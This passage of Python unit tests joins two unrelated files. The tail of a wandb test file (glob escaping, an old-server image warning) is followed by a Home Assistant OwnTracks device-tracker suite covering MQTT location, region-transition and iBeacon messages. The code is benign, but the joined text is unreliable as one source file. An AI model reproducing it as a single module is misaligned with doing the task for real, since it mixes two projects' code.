            [],
        ) in mocked_run._backend.interface.publish_files.call_args_list
        for g, _ in files_dict["files"]
    ]
    # The raw key must never appear unescaped, while its escaped form must.
    assert not any(weird_key in g for g in published_globs), published_globs
    assert any(glob.escape(weird_key) in g for g in published_globs), published_globs
def test_image_array_old_wandb(
    live_mock_server, test_settings, monkeypatch, capsys, parse_ctx
):
    """Old servers can't store image filenames; a warning must go to stderr.

    Fix: the original assertion was accidentally split into two statements, so
    ``assert "Unable to log image array filenames..."`` always passed (a
    non-empty string literal is truthy) and the ``... in outerr.err`` check on
    the next line was a no-op expression.  Parenthesizing makes the implicitly
    concatenated message actually get tested against stderr.  A joining space
    is added between "being" and "viewed" — presumably the intended message
    text; verify against the warning emitted by wandb.util.
    """
    monkeypatch.setattr(wandb.util, "_get_max_cli_version", lambda: "0.10.33")
    run = wandb.init(settings=test_settings)
    im_count = 5
    wb_image = [wandb.Image(image) for i in range(im_count)]
    run.log({"logged_images": wb_image})
    run.finish()
    ctx_util = parse_ctx(live_mock_server.get_ctx())
    outerr = capsys.readouterr()
    assert (
        "Unable to log image array filenames. In some cases, this can prevent images from being"
        " viewed in the UI. Please upgrade your wandb server." in outerr.err
    )
    # With filename support unavailable, the summary must not record filenames.
    summary = ctx_util.summary
    assert "filenames" not in list(summary["logged_images"].keys())
# ---------------------------------------------------------------------------
"""The tests for the Owntracks device tracker."""
import json
import pytest
from homeassistant.components import owntracks
from homeassistant.const import STATE_NOT_HOME
from homeassistant.setup import async_setup_component
from tests.async_mock import patch
from tests.common import MockConfigEntry, async_fire_mqtt_message, mock_coro
# Identity used to build every topic name below.
USER = "greg"
DEVICE = "phone"
# MQTT topics the OwnTracks integration handles for this user/device.
LOCATION_TOPIC = f"owntracks/{USER}/{DEVICE}"
EVENT_TOPIC = f"owntracks/{USER}/{DEVICE}/event"
WAYPOINTS_TOPIC = f"owntracks/{USER}/{DEVICE}/waypoints"
WAYPOINT_TOPIC = f"owntracks/{USER}/{DEVICE}/waypoint"
# A user NOT in the waypoint import whitelist configured by the `context`
# fixture -- waypoints published on this topic must be ignored.
USER_BLACKLIST = "ram"
WAYPOINTS_TOPIC_BLOCKED = f"owntracks/{USER_BLACKLIST}/{DEVICE}/waypoints"
LWT_TOPIC = f"owntracks/{USER}/{DEVICE}/lwt"
BAD_TOPIC = f"owntracks/{USER}/{DEVICE}/unsupported"
# Entity id the device tracker creates for USER/DEVICE.
DEVICE_TRACKER_STATE = f"device_tracker.{USER}_{DEVICE}"
IBEACON_DEVICE = "keys"
# Template for entity ids of mobile beacon trackers.
MOBILE_BEACON_FMT = "device_tracker.beacon_{}"
CONF_MAX_GPS_ACCURACY = "max_gps_accuracy"
CONF_WAYPOINT_IMPORT = owntracks.CONF_WAYPOINT_IMPORT
CONF_WAYPOINT_WHITELIST = owntracks.CONF_WAYPOINT_WHITELIST
CONF_SECRET = owntracks.CONF_SECRET
CONF_MQTT_TOPIC = owntracks.CONF_MQTT_TOPIC
CONF_EVENTS_ONLY = owntracks.CONF_EVENTS_ONLY
CONF_REGION_MAPPING = owntracks.CONF_REGION_MAPPING
# Test geometry: degrees-per-meter conversion at the test latitude.
TEST_ZONE_LAT = 45.0
TEST_ZONE_LON = 90.0
TEST_ZONE_DEG_PER_M = 0.0000127
FIVE_M = TEST_ZONE_DEG_PER_M * 5.0
# Home Assistant Zones
# "inner" is a small (50 m) zone offset slightly from the center of the huge
# (100 km radius) "outer" zone, so inner lies entirely inside outer.
INNER_ZONE = {
    "name": "zone",
    "latitude": TEST_ZONE_LAT + 0.1,
    "longitude": TEST_ZONE_LON + 0.1,
    "radius": 50,
}
OUTER_ZONE = {
    "name": "zone",
    "latitude": TEST_ZONE_LAT,
    "longitude": TEST_ZONE_LON,
    "radius": 100000,
}
def build_message(test_params, default_params):
    """Return a copy of *default_params* with *test_params* overlaid on top."""
    merged = dict(default_params)
    merged.update(test_params)
    return merged
# Default message parameters
DEFAULT_LOCATION_MESSAGE = {
    "_type": "location",
    "lon": OUTER_ZONE["longitude"],
    "lat": OUTER_ZONE["latitude"],
    "acc": 60,  # GPS accuracy in meters
    "tid": "user",
    "t": "u",
    "batt": 92,
    "cog": 248,
    "alt": 27,
    "p": 101.3977584838867,
    "vac": 4,
    "tst": 1,
    "vel": 0,
}
# Owntracks will publish a transition when crossing
# a circular region boundary.
# Degrees of latitude spanned by the inner zone's radius.
ZONE_EDGE = TEST_ZONE_DEG_PER_M * INNER_ZONE["radius"]
DEFAULT_TRANSITION_MESSAGE = {
    "_type": "transition",
    "t": "c",  # circular-region trigger (contrast "b" = beacon below)
    "lon": INNER_ZONE["longitude"],
    "lat": INNER_ZONE["latitude"] - ZONE_EDGE,
    "acc": 60,
    "event": "enter",
    "tid": "user",
    "desc": "inner",
    "wtst": 1,
    "tst": 2,
}
# iBeacons that are named the same as an HA zone
# are used to trigger enter and leave updates
# for that zone. In this case the "inner" zone.
#
# iBeacons that do not share an HA zone name
# are treated as mobile tracking devices for
# objects which can't track themselves e.g. keys.
#
# iBeacons are typically configured with the
# default lat/lon 0.0/0.0 and have acc 0.0 but
# regardless the reported location is not trusted.
#
# Owntracks will send both a location message
# for the device and an 'event' message for
# the beacon transition.
DEFAULT_BEACON_TRANSITION_MESSAGE = {
    "_type": "transition",
    "t": "b",  # beacon trigger
    "lon": 0.0,
    "lat": 0.0,
    "acc": 0.0,
    "event": "enter",
    "tid": "user",
    "desc": "inner",
    "wtst": 1,
    "tst": 2,
}
# Location messages
LOCATION_MESSAGE = DEFAULT_LOCATION_MESSAGE
# acc 2000 m is worse than the 200 m max_gps_accuracy configured by the
# `context` fixture, so this update should be discarded.
LOCATION_MESSAGE_INACCURATE = build_message(
    {
        "lat": INNER_ZONE["latitude"] - ZONE_EDGE,
        "lon": INNER_ZONE["longitude"] - ZONE_EDGE,
        "acc": 2000,
    },
    LOCATION_MESSAGE,
)
# Zero-accuracy fixes are likewise ignored.
LOCATION_MESSAGE_ZERO_ACCURACY = build_message(
    {
        "lat": INNER_ZONE["latitude"] - ZONE_EDGE,
        "lon": INNER_ZONE["longitude"] - ZONE_EDGE,
        "acc": 0,
    },
    LOCATION_MESSAGE,
)
# A fix roughly 2 degrees away from the zones: outside every defined zone.
LOCATION_MESSAGE_NOT_HOME = build_message(
    {
        "lat": OUTER_ZONE["latitude"] - 2.0,
        "lon": INNER_ZONE["longitude"] - 2.0,
        "acc": 100,
    },
    LOCATION_MESSAGE,
)
# Region GPS messages
REGION_GPS_ENTER_MESSAGE = DEFAULT_TRANSITION_MESSAGE
# Leave event placed 10 zone-radii outside "inner".
REGION_GPS_LEAVE_MESSAGE = build_message(
    {
        "lon": INNER_ZONE["longitude"] - ZONE_EDGE * 10,
        "lat": INNER_ZONE["latitude"] - ZONE_EDGE * 10,
        "event": "leave",
    },
    DEFAULT_TRANSITION_MESSAGE,
)
REGION_GPS_ENTER_MESSAGE_INACCURATE = build_message(
    {"acc": 2000}, REGION_GPS_ENTER_MESSAGE
)
REGION_GPS_LEAVE_MESSAGE_INACCURATE = build_message(
    {"acc": 2000}, REGION_GPS_LEAVE_MESSAGE
)
REGION_GPS_ENTER_MESSAGE_ZERO = build_message({"acc": 0}, REGION_GPS_ENTER_MESSAGE)
REGION_GPS_LEAVE_MESSAGE_ZERO = build_message({"acc": 0}, REGION_GPS_LEAVE_MESSAGE)
REGION_GPS_LEAVE_MESSAGE_OUTER = build_message(
    {
        "lon": OUTER_ZONE["longitude"] - 2.0,
        "lat": OUTER_ZONE["latitude"] - 2.0,
        "desc": "outer",
        "event": "leave",
    },
    DEFAULT_TRANSITION_MESSAGE,
)
REGION_GPS_ENTER_MESSAGE_OUTER = build_message(
    {
        "lon": OUTER_ZONE["longitude"],
        "lat": OUTER_ZONE["latitude"],
        "desc": "outer",
        "event": "enter",
    },
    DEFAULT_TRANSITION_MESSAGE,
)
# Region Beacon messages
REGION_BEACON_ENTER_MESSAGE = DEFAULT_BEACON_TRANSITION_MESSAGE
REGION_BEACON_LEAVE_MESSAGE = build_message(
    {"event": "leave"}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
# Mobile Beacon messages ("keys" does not match any HA zone name, so it is
# tracked as a mobile beacon rather than a region).
MOBILE_BEACON_ENTER_EVENT_MESSAGE = build_message(
    {"desc": IBEACON_DEVICE}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
MOBILE_BEACON_LEAVE_EVENT_MESSAGE = build_message(
    {"desc": IBEACON_DEVICE, "event": "leave"}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
# Waypoint messages
WAYPOINTS_EXPORTED_MESSAGE = {
    "_type": "waypoints",
    "_creator": "test",
    "waypoints": [
        {
            "_type": "waypoint",
            "tst": 3,
            "lat": 47,
            "lon": 9,
            "rad": 10,
            "desc": "exp_wayp1",
        },
        {
            "_type": "waypoint",
            "tst": 4,
            "lat": 3,
            "lon": 9,
            "rad": 500,
            "desc": "exp_wayp2",
        },
    ],
}
# Same waypoint name ("exp_wayp1") with moved coordinates and a new radius.
WAYPOINTS_UPDATED_MESSAGE = {
    "_type": "waypoints",
    "_creator": "test",
    "waypoints": [
        {
            "_type": "waypoint",
            "tst": 4,
            "lat": 9,
            "lon": 47,
            "rad": 50,
            "desc": "exp_wayp1",
        }
    ],
}
# A single waypoint published on the singular "waypoint" topic.
WAYPOINT_MESSAGE = {
    "_type": "waypoint",
    "tst": 4,
    "lat": 9,
    "lon": 47,
    "rad": 50,
    "desc": "exp_wayp1",
}
# Zone entity ids expected from imported waypoints ("<user>_<device>_<desc>").
WAYPOINT_ENTITY_NAMES = [
    "zone.greg_phone_exp_wayp1",
    "zone.greg_phone_exp_wayp2",
    "zone.ram_phone_exp_wayp1",
    "zone.ram_phone_exp_wayp2",
]
# Last-will-and-testament payload and an unsupported message type.
LWT_MESSAGE = {"_type": "lwt", "tst": 1}
BAD_MESSAGE = {"_type": "unsupported", "tst": 1}
# Wrapped around valid JSON by send_message(corrupt=True) to produce an
# unparseable payload.
BAD_JSON_PREFIX = "--$this is bad json#--"
BAD_JSON_SUFFIX = "** and it ends here ^^"
# pylint: disable=invalid-name, len-as-condition, redefined-outer-name


@pytest.fixture
def setup_comp(hass, mock_device_tracker_conf, mqtt_mock):
    """Initialize components."""
    assert hass.loop.run_until_complete(
        async_setup_component(hass, "persistent_notification", {})
    )
    hass.loop.run_until_complete(async_setup_component(hass, "device_tracker", {}))
    # Register the zones the tests move between; "inner_2" shares the
    # geometry of "inner".
    hass.states.async_set("zone.inner", "zoning", INNER_ZONE)
    hass.states.async_set("zone.inner_2", "zoning", INNER_ZONE)
    hass.states.async_set("zone.outer", "zoning", OUTER_ZONE)
    yield
async def setup_owntracks(hass, config, ctx_cls=owntracks.OwnTracksContext):
    """Set up OwnTracks."""
    MockConfigEntry(
        domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
    ).add_to_hass(hass)
    # Patch the context class so tests can substitute or capture the context
    # instance created during setup.
    with patch.object(owntracks, "OwnTracksContext", ctx_cls):
        assert await async_setup_component(hass, "owntracks", {"owntracks": config})
        await hass.async_block_till_done()
@pytest.fixture
def context(hass, setup_comp):
    """Set up the mocked context."""
    orig_context = owntracks.OwnTracksContext
    context = None

    # pylint: disable=no-value-for-parameter
    def store_context(*args):
        """Store the context."""
        # Capture the real context instance while still constructing it
        # normally, so tests can inspect/mutate its state.
        nonlocal context
        context = orig_context(*args)
        return context

    hass.loop.run_until_complete(
        setup_owntracks(
            hass,
            {
                CONF_MAX_GPS_ACCURACY: 200,
                CONF_WAYPOINT_IMPORT: True,
                CONF_WAYPOINT_WHITELIST: ["jon", "greg"],
            },
            store_context,
        )
    )

    def get_context():
        """Get the current context."""
        return context

    # Yield an accessor rather than the object: the context is created
    # lazily inside setup_owntracks above.
    yield get_context
async def send_message(hass, topic, message, corrupt=False):
    """Serialize *message* to JSON, fire it on *topic*, and wait for processing."""
    payload = json.dumps(message)
    if corrupt:
        # Wrap the valid JSON in junk so the integration sees a parse error.
        payload = BAD_JSON_PREFIX + payload + BAD_JSON_SUFFIX
    async_fire_mqtt_message(hass, topic, payload)
    await hass.async_block_till_done()
    await hass.async_block_till_done()
# --- Assertion helpers ---------------------------------------------------
# The assert_location_* helpers inspect the primary device tracker entity
# (DEVICE_TRACKER_STATE); the assert_mobile_tracker_* helpers inspect the
# entity of a mobile beacon (default: the "keys" iBeacon).


def assert_location_state(hass, location):
    """Test the assertion of a location state."""
    state = hass.states.get(DEVICE_TRACKER_STATE)
    assert state.state == location


def assert_location_latitude(hass, latitude):
    """Test the assertion of a location latitude."""
    state = hass.states.get(DEVICE_TRACKER_STATE)
    assert state.attributes.get("latitude") == latitude


def assert_location_longitude(hass, longitude):
    """Test the assertion of a location longitude."""
    state = hass.states.get(DEVICE_TRACKER_STATE)
    assert state.attributes.get("longitude") == longitude


def assert_location_accuracy(hass, accuracy):
    """Test the assertion of a location accuracy."""
    state = hass.states.get(DEVICE_TRACKER_STATE)
    assert state.attributes.get("gps_accuracy") == accuracy


def assert_location_source_type(hass, source_type):
    """Test the assertion of source_type."""
    state = hass.states.get(DEVICE_TRACKER_STATE)
    assert state.attributes.get("source_type") == source_type


def assert_mobile_tracker_state(hass, location, beacon=IBEACON_DEVICE):
    """Test the assertion of a mobile beacon tracker state."""
    dev_id = MOBILE_BEACON_FMT.format(beacon)
    state = hass.states.get(dev_id)
    assert state.state == location


def assert_mobile_tracker_latitude(hass, latitude, beacon=IBEACON_DEVICE):
    """Test the assertion of a mobile beacon tracker latitude."""
    dev_id = MOBILE_BEACON_FMT.format(beacon)
    state = hass.states.get(dev_id)
    assert state.attributes.get("latitude") == latitude


def assert_mobile_tracker_accuracy(hass, accuracy, beacon=IBEACON_DEVICE):
    """Test the assertion of a mobile beacon tracker accuracy."""
    dev_id = MOBILE_BEACON_FMT.format(beacon)
    state = hass.states.get(dev_id)
    assert state.attributes.get("gps_accuracy") == accuracy
async def test_location_invalid_devid(hass, context):
    """Test the update of a location."""
    # The "-" in the device id is slugified to "_" in the entity id.
    await send_message(hass, "owntracks/paulus/nexus-5x", LOCATION_MESSAGE)
    state = hass.states.get("device_tracker.paulus_nexus_5x")
    assert state.state == "outer"


async def test_location_update(hass, context):
    """Test the update of a location."""
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    assert_location_source_type(hass, "gps")
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
    assert_location_state(hass, "outer")


async def test_location_update_no_t_key(hass, context):
    """Test the update of a location when message does not contain 't'."""
    message = LOCATION_MESSAGE.copy()
    message.pop("t")
    await send_message(hass, LOCATION_TOPIC, message)
    # Behaves exactly like a message carrying the trigger key.
    assert_location_source_type(hass, "gps")
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
    assert_location_state(hass, "outer")


async def test_location_inaccurate_gps(hass, context):
    """Test the location for inaccurate GPS information."""
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_INACCURATE)
    # Ignored inaccurate GPS. Location remains at previous.
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_longitude(hass, LOCATION_MESSAGE["lon"])


async def test_location_zero_accuracy_gps(hass, context):
    """Ignore the location for zero accuracy GPS information."""
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_ZERO_ACCURACY)
    # Ignored inaccurate GPS. Location remains at previous.
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_longitude(hass, LOCATION_MESSAGE["lon"])
# ------------------------------------------------------------------------
# GPS based event entry / exit testing


async def test_event_gps_entry_exit(hass, context):
    """Test the entry event."""
    # Entering the owntracks circular region named "inner"
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    # Enter uses the zone's gps co-ords
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # Updates ignored when in a zone
    # note that LOCATION_MESSAGE is actually pretty far
    # from INNER_ZONE and has good accuracy. I haven't
    # received a transition message though so I'm still
    # associated with the inner zone regardless of GPS.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    # Exit switches back to GPS
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
    assert_location_state(hass, "outer")
    # Left clean zone state
    assert not context().regions_entered[USER]
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # Now sending a location update moves me again.
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])


async def test_event_gps_with_spaces(hass, context):
    """Test the entry event."""
    # Zone names containing spaces must round-trip through enter/leave.
    message = build_message({"desc": "inner 2"}, REGION_GPS_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner 2")
    message = build_message({"desc": "inner 2"}, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # Left clean zone state
    assert not context().regions_entered[USER]
async def test_event_gps_entry_inaccurate(hass, context):
    """Test the event for inaccurate entry."""
    # Set location to the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_INACCURATE)
    # I enter the zone even though the message GPS was inaccurate.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")


async def test_event_gps_entry_exit_inaccurate(hass, context):
    """Test the event for inaccurate exit."""
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    # Enter uses the zone's gps co-ords
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_INACCURATE)
    # Exit doesn't use inaccurate gps
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    # But does exit region correctly
    assert not context().regions_entered[USER]


async def test_event_gps_entry_exit_zero_accuracy(hass, context):
    """Test entry/exit events with accuracy zero."""
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_ZERO)
    # Enter uses the zone's gps co-ords
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_ZERO)
    # Exit doesn't use zero gps
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    # But does exit region correctly
    assert not context().regions_entered[USER]
async def test_event_gps_exit_outside_zone_sets_away(hass, context):
    """Test the event for exit zone."""
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_location_state(hass, "inner")
    # Exit message far away GPS location
    message = build_message({"lon": 90.0, "lat": 90.0}, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # Exit forces zone change to away
    assert_location_state(hass, STATE_NOT_HOME)


async def test_event_gps_entry_exit_right_order(hass, context):
    """Test the event for ordering."""
    # Enter inner zone
    # Set location to the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_location_state(hass, "inner")
    # Enter inner2 zone
    message = build_message({"desc": "inner_2"}, REGION_GPS_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner_2")
    # Exit inner_2 - should be in 'inner'
    message = build_message({"desc": "inner_2"}, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner")
    # Exit inner - should be in 'outer'
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
    assert_location_state(hass, "outer")


async def test_event_gps_entry_exit_wrong_order(hass, context):
    """Test the event for wrong order."""
    # Enter inner zone
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_location_state(hass, "inner")
    # Enter inner2 zone
    message = build_message({"desc": "inner_2"}, REGION_GPS_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner_2")
    # Exit inner - should still be in 'inner_2'
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    assert_location_state(hass, "inner_2")
    # Exit inner_2 - should be in 'outer'
    message = build_message({"desc": "inner_2"}, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
    assert_location_state(hass, "outer")
async def test_event_gps_entry_unknown_zone(hass, context):
    """Test the event for unknown zone."""
    # Just treat as location update
    message = build_message({"desc": "unknown"}, REGION_GPS_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_latitude(hass, REGION_GPS_ENTER_MESSAGE["lat"])
    # The GPS coords of the enter message still fall inside "inner".
    assert_location_state(hass, "inner")


async def test_event_gps_exit_unknown_zone(hass, context):
    """Test the event for unknown zone."""
    # Just treat as location update
    message = build_message({"desc": "unknown"}, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_location_state(hass, "outer")


async def test_event_entry_zone_loading_dash(hass, context):
    """Test the event for zone landing."""
    # Make sure the leading - is ignored
    # Owntracks uses this to switch on hold
    message = build_message({"desc": "-inner"}, REGION_GPS_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner")
async def test_events_only_on(hass, context):
    """Test events_only config suppresses location updates."""
    # Sending a location message that is not home
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
    assert_location_state(hass, STATE_NOT_HOME)
    context().events_only = True
    # Enter and Leave messages
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_OUTER)
    assert_location_state(hass, "outer")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
    assert_location_state(hass, STATE_NOT_HOME)
    # Sending a location message that is inside outer zone
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # Ignored location update. Location remains at previous.
    assert_location_state(hass, STATE_NOT_HOME)


async def test_events_only_off(hass, context):
    """Test when events_only is False."""
    # Sending a location message that is not home
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
    assert_location_state(hass, STATE_NOT_HOME)
    context().events_only = False
    # Enter and Leave messages
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_OUTER)
    assert_location_state(hass, "outer")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
    assert_location_state(hass, STATE_NOT_HOME)
    # Sending a location message that is inside outer zone
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # Location update processed
    assert_location_state(hass, "outer")
async def test_event_source_type_entry_exit(hass, context):
    """Test the entry and exit events of source type."""
    # Entering the owntracks circular region named "inner"
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    # source_type should be gps when entering using gps.
    assert_location_source_type(hass, "gps")
    # owntracks shouldn't send beacon events with acc = 0
    await send_message(
        hass, EVENT_TOPIC, build_message({"acc": 1}, REGION_BEACON_ENTER_MESSAGE)
    )
    # We should be able to enter a beacon zone even inside a gps zone
    assert_location_source_type(hass, "bluetooth_le")
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    # source_type should be gps when leaving using gps.
    assert_location_source_type(hass, "gps")
    # owntracks shouldn't send beacon events with acc = 0
    await send_message(
        hass, EVENT_TOPIC, build_message({"acc": 1}, REGION_BEACON_LEAVE_MESSAGE)
    )
    assert_location_source_type(hass, "bluetooth_le")
# Region Beacon based event entry / exit testing


async def test_event_region_entry_exit(hass, context):
    """Test the entry event."""
    # Seeing a beacon named "inner"
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    # Enter uses the zone's gps co-ords
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # Updates ignored when in a zone
    # note that LOCATION_MESSAGE is actually pretty far
    # from INNER_ZONE and has good accuracy. I haven't
    # received a transition message though so I'm still
    # associated with the inner zone regardless of GPS.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    # Exit switches back to GPS but the beacon has no coords
    # so I am still located at the center of the inner region
    # until I receive a location update.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
    # Left clean zone state
    assert not context().regions_entered[USER]
    # Now sending a location update moves me again.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
async def test_event_region_with_spaces(hass, context):
    """Test the entry event."""
    # Beacon-region names containing spaces must round-trip too.
    message = build_message({"desc": "inner 2"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner 2")
    message = build_message({"desc": "inner 2"}, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # Left clean zone state
    assert not context().regions_entered[USER]


async def test_event_region_entry_exit_right_order(hass, context):
    """Test the event for ordering."""
    # Enter inner zone
    # Set location to the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # See 'inner' region beacon
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    assert_location_state(hass, "inner")
    # See 'inner_2' region beacon
    message = build_message({"desc": "inner_2"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner_2")
    # Exit inner_2 - should be in 'inner'
    message = build_message({"desc": "inner_2"}, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner")
    # Exit inner - should be in 'outer'
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    # I have not had an actual location update yet and my
    # coordinates are set to the center of the last region I
    # entered which puts me in the inner zone.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner")
async def test_event_region_entry_exit_wrong_order(hass, context):
    """Test the event for wrong order."""
    # Enter inner zone
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    assert_location_state(hass, "inner")
    # Enter inner2 zone
    message = build_message({"desc": "inner_2"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner_2")
    # Exit inner - should still be in 'inner_2'
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    assert_location_state(hass, "inner_2")
    # Exit inner_2 - should be in 'outer'
    message = build_message({"desc": "inner_2"}, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # I have not had an actual location update yet and my
    # coordinates are set to the center of the last region I
    # entered which puts me in the inner_2 zone.
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_accuracy(hass, INNER_ZONE["radius"])
    assert_location_state(hass, "inner_2")


async def test_event_beacon_unknown_zone_no_location(hass, context):
    """Test the event for unknown zone."""
    # A beacon which does not match a HA zone is the
    # definition of a mobile beacon. In this case, "unknown"
    # will be turned into device_tracker.beacon_unknown and
    # that will be tracked at my current location. Except
    # in this case my Device hasn't had a location message
    # yet so it's in an odd state where it has state.state
    # None and no GPS coords to set the beacon to.
    hass.states.async_set(DEVICE_TRACKER_STATE, None)
    message = build_message({"desc": "unknown"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # My current state is None because I haven't seen a
    # location message or a GPS or Region # Beacon event
    # message. None is the state the test harness set for
    # the Device during test case setup.
    assert_location_state(hass, "None")
    # We have had no location yet, so the beacon status
    # set to unknown.
    assert_mobile_tracker_state(hass, "unknown", "unknown")
